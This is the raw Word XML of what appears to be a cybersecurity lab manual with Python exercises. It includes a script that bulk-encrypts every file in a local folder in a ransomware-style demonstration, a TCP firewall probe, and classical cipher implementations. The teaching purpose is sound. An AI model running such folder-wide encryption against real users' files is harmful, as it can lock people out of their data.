      </w:r>
    </w:p>
    <w:p w14:paraId="68880D0C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with open(filepath, "wb") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46697201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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                f.write(encrypted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564778BD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print("All files have been encrypted.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEFC57A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</w:p>
    <w:p w14:paraId="1F77927E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decrypt_files(folder, key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493BB5F4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cipher = Fernet(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C024BD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for filename in os.listdir(folder):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704E2AFE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filepath = os.path.join(folder, filename)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D4454B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if os.path.isfile(filepath):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4772FAD4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with open(filepath, "rb") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210D73C8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    data = f.read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1F8531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decrypted = cipher.decrypt(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004571DC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with open(filepath, "wb") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032DBC3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        f.write(decrypted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9A8C23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print("All files have been decrypted.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFEC9C3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</w:p>
    <w:p w14:paraId="0C8EF421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def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63384D3F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folder = "C:/Users/bhara/Downloads/test_folder"  # Ensure this folder exists and contains test files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F85560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action = input("Enter 'E' to encrypt or 'D' to decrypt files: ").strip().upper()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEFF9D3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if action == "E":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474FE51A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key = generate_key()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F14F1EE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encrypt_files(folder, key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41922F5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elif action == "D":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202F34C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key = load_key()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E08D97C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decrypt_files(folder, key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448C5B6A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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579BC487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    print("Invalid option. Use 'E' for encrypt or 'D' for decrypt.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCF52C7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</w:p>
    <w:p w14:paraId="65A746B3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>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C81F43D" w14:textId="5D5039E3" w:rsidR="008D5F68" w:rsidRDefault="008D5F68" w:rsidP="008D5F68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="1080" w:right="790" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D5F68">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7510C9E9" w14:textId="77777777" w:rsidR="008D5F68" w:rsidRPr="008D5F68" w:rsidRDefault="008D5F68" w:rsidP="008D5F68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="1080" w:right="790" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B7AFB5B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ind w:right="1447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packets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analyzes blocked/allowed responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775E09D8" w14:textId="77777777" w:rsidR="00C1187A" w:rsidRDefault="00C1187A" w:rsidP="00C1187A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="1447" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1975FE5F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>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAC34A3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>import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6C3EEA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>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B6477D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</w:p>
    <w:p w14:paraId="59E14DE4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>def test_firewall(target_ip, port=80):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3376089C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print(f"Testing firewall at {target_ip}:{port}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523507E9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sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577D5B2C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sock.settimeout(2)  # 2-second timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1F858A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start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7753082C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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476D88BA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print(f"Sending TCP SYN packet to {target_ip} on port {port}...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50233471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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719FA9F7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    sock.connect((target_ip, port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15485D8C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    elapsed = time.time() - start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14397E3B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    print(f"Packet Allowed: Connection successful in {elapsed:.2f} seconds")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAC6403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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        sock.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C85CB56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except socket.timeout:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D69303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    print("Packet Blocked: Timeout after 2 seconds")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D29BCD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except socket.error as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAFECC7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    print(f"Packet Blocked: Connection failed ({e})")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1B57F3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finally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3309CDF5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    sock.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2F1130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</w:p>
    <w:p w14:paraId="1AB32878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>def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662448C0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target_ip = input("Enter target IP address: ").strip()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1907E0B1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print(f"Starting test for {target_ip}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E43B234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test_firewall(target_ip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66184ECD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print("Test complete.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D940D7A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</w:p>
    <w:p w14:paraId="43D5D697" w14:textId="77777777" w:rsidR="00C1187A" w:rsidRPr="00C1187A" w:rsidRDefault="00C1187A" w:rsidP="00C1187A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="1447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>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB17608" w14:textId="7D962D74" w:rsidR="00C1187A" w:rsidRDefault="00C1187A" w:rsidP="00C1187A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="1447" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C1187A">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CB3BBD" w14:textId="77777777" w:rsidR="00626841" w:rsidRPr="00C1187A" w:rsidRDefault="00626841" w:rsidP="00C1187A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="1447" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58098DB3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encryption,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substitution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techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018DFC59" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:before="2" w:line="293" w:lineRule="exact"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ceaser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F16A086" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="101"/>
        </w:num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t>Playfair</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62190560" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="101"/>
        </w:num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t>Hill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F0313A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRPr="00626841" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="101"/>
        </w:num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t>Vigenere</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E79782F" w14:textId="77777777" w:rsidR="00626841" w:rsidRDefault="00626841" w:rsidP="00626841">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:line="293" w:lineRule="exact"/>
        <w:ind w:left="1800" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00D2C90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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3177785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import numpy as np</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4FCD0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import string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4378CEA8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C9CEE08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### Caesar Cipher ###</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B646B11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caesar_encrypt(plaintext, shift):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566C53E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result = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DC828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for char in plaintext:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A88C0FF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if char.isalpha():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B60E0D0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base = 'A' if char.isupper() else 'a'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9D4DC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chr((ord(char) - ord(base) + shift) % 26 + ord(base))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BE7AD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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7AEA4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char</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F79DE9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result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115DF17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5C047608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caesar_decrypt(ciphertext, shift):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3231060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caesar_encrypt(ciphertext, -shift)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC0C3F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72B700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### Playfair Cipher (simplified) ###</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2876132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generate_playfair_table(key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C907F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 = "".join(dict.fromkeys(key.upper().replace("J", "I")))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F42ADC6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alphabet = "ABCDEFGHIKLMNOPQRSTUVWXYZ"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C115D1E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table = key + "".join([c for c in alphabet if c not in key])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412E401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[table[i*5:(i+1)*5] for i in range(5)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265D4CF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645E18F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lastRenderedPageBreak/>
        <w:t>def playfair_encrypt(plaintext, key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F16E6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table = generate_playfair_table(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31259D71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# Preprocess: remove spaces, replace J with I, and pad with X if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B15D617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text = plaintext.upper().replace(" ", "").replace("J", "I")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC2E24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if len(text) % 2 != 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526ED6C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text += "X"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0132006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result = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76468280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# Find row and column in table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0957D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def find_pos(letter):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237BDBB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for i, row in enumerate(table):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A840E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if letter in row:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECE1CA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    return i, row.index(letter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142E2AD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for i in range(0, len(text), 2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2ED48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a, b = text[i], text[i+1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019BDEA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r1, c1 = find_pos(a)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B9EC4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r2, c2 = find_pos(b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA98B47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if r1 == r2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6950E5E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table[r1][(c1+1)%5] + table[r2][(c2+1)%5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F91ABB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elif c1 == c2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72752D3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table[(r1+1)%5][c1] + table[(r2+1)%5][c2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1453CD5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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF8D43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table[r1][c2] + table[r2][c1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF27E3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result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE04F28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6A49894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# (A corresponding decryption function is similar but with reverse shifts; omitted for brevity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222410CF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5CA58886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### Hill Cipher (2x2) ###</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557366C7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hill_encrypt(plaintext, key_matrix):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473AC1E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plaintext = plaintext.upper().replace(" ", "")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342E6E9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if len(plaintext) % 2 != 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7454D03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plaintext += "X"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C4035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result = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC170D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for i in range(0, len(plaintext), 2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E126CD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pair = [ord(plaintext[i]) - ord('A'), ord(plaintext[i+1]) - ord('A')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E5C581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enc = np.dot(key_matrix, pair) % 26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D69A3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result += chr(int(enc[0]) + ord('A')) + chr(int(enc[1]) + ord('A'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E7EEB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result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BE23DE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6072F4B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hill_decrypt(ciphertext, inv_key_matrix):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35239827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result = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3190F16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for i in range(0, len(ciphertext), 2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208AB39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pair = [ord(ciphertext[i]) - ord('A'), ord(ciphertext[i+1]) - ord('A')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0418B5A0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dec = np.dot(inv_key_matrix, pair) % 26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FC61B7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result += chr(int(dec[0]) + ord('A')) + chr(int(dec[1]) + ord('A'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673D71D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result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B45F098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52BD1B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lastRenderedPageBreak/>
        <w:t># Using fixed key matrix for Hill cipher: key=[[3,3],[2,5]] with inverse mod26 = [[15,17],[20,9]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D19DCF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hill_key = np.array([[3, 3], [2, 5]])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643E7DA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hill_inv = np.array([[15, 17], [20, 9]])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C67DADE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4744570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### Vigenère Cipher ###</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CAB1D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vigenere_encrypt(plaintext, key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3215048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result = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5AB7AE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 = key.upper()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124580D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key_length = len(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6D01BE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for i, char in enumerate(plaintext.upper()):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E881A1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if char in string.ascii_uppercase:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C1F2C0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shift = ord(key[i % key_length]) - ord('A')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508A93D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chr((ord(char) - ord('A') + shift) % 26 + ord('A'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5705CF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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7886BA7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char</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ABCF7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result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51436558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2193BBA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vigenere_decrypt(ciphertext, key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B92077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result = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C34993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 = key.upper()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E60BE0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key_length = len(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C625BD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for i, char in enumerate(ciphertext.upper()):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1469AA7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if char in string.ascii_uppercase:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BE223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shift = ord(key[i % key_length]) - ord('A')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D32DF7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chr((ord(char) - ord('A') - shift) % 26 + ord('A'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B4738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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC1205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        result += char</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78038891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return result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9B1B6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6B76706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def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C38F57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text = "HELLO WORLD"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5EC7C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print("Caesar Cipher:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35223E6F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enc = caesar_encrypt(text, 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC203CF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print("Encrypted:", enc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17191416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print("Decrypted:", caesar_decrypt(enc, 3))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38245B72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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D4FAE1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print("\nPlayfair Cipher:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A97B1B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key_pf = "MONARCHY"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE48DD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enc_pf = playfair_encrypt(text, key_pf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4121E1BF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print("Encrypted:", enc_pf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDE2D29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# Decryption for Playfair is omitted for simplicity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2577506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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D53E5A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print("\nHill Cipher:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469DB23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enc_hill = hill_encrypt("HI", hill_key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACA1E7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print("Encrypted:", enc_hill)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270000E5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print("Decrypted:", hill_decrypt(enc_hill, hill_inv))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462F0B1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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CA1AAC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print("\nVigenère Cipher:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056E08BD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key_vig = "KEY"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6951DC60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enc_vig = vigenere_encrypt(text, key_vig)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0480450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print("Encrypted:", enc_vig)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E55544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print("Decrypted:", vigenere_decrypt(enc_vig, key_vig))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4404FA3A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E006BD3" w14:textId="77777777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>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747E999D" w14:textId="41352E95" w:rsidR="00626841" w:rsidRPr="00626841" w:rsidRDefault="00626841" w:rsidP="00626841">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:line="293" w:lineRule="exact"/>
        <w:ind w:left="1800" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00626841">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9D79DA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line="276" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359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transposition </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D587CBB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:before="2" w:line="294" w:lineRule="exact"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Rail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> fence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B5F84A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRPr="002A71B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="101"/>
        </w:num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t>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Transformation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2913817D" w14:textId="77777777" w:rsidR="002A71B5" w:rsidRDefault="002A71B5" w:rsidP="002A71B5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:line="293" w:lineRule="exact"/>
        <w:ind w:left="1800" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6068F4F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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3589CC7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275E84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### Rail Fence Cipher ###</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005D50C7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rail_fence_encrypt(text, num_rails):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F0995F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rail = [''] * num_rails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2738890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direction = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEDB1FA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row = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD194E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char in text:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6649DD3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rail[row] += char</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB7B65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if row == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DBB02E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direction = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B02967F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elif row == num_rails - 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D54726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direction = -1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB5EBC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row += direction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D221B2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''.join(rail)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0077E74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12EF84C7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rail_fence_decrypt(cipher, num_rails):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C589CF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# Create an empty fence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A447C10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fence = [[''] * len(cipher) for _ in range(num_rails)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30585A4D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idx = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488D0E2B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# Mark positions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66656B6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row, direction = 0, 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD70C56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i in range(len(cipher)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640133FB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fence[row][i] = '*'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D33FDE0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if row == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9F3E1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direction = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1E99CD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elif row == num_rails - 1:</w:t>
      </w:r>
    </w:p>
